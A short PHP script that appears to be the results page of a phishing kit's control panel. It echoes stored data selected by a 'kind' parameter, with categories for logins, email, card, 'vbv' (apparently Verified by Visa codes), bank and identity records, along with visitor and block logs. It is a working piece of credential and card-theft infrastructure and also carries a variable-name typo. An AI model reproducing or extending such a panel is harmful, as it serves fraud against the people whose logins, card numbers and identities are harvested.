<?php
include "session.php";
require_once "function.php";

$dateresult = '';

if ($_GET["kind"] == "all") {
    $dataresult = getresult("all");
}
else if ($_GET["kind"] == "visitor") {
    $dataresult = getresult("visitor");
}
else if ($_GET["kind"] == "blocked") {
    $dataresult = getresult("blocked");
}
else if ($_GET["kind"] == "logvisit") {
    $dataresult = getresult("logvisit");
}
else if ($_GET["kind"] == "login") {
    $dataresult = getresult("login");
}
else if ($_GET["kind"] == "email") {
    $dataresult = getresult("email");
}
else if ($_GET["kind"] == "card") {
    $dataresult = getresult("card");
}
else if ($_GET["kind"] == "vbv") {
    $dataresult = getresult("vbv");
}
else if ($_GET["kind"] == "bank") {
    $dataresult = getresult("bank");
}
else if ($_GET["kind"] == "ident") {
    $dataresult = getresult("ident");
}

echo $dataresult;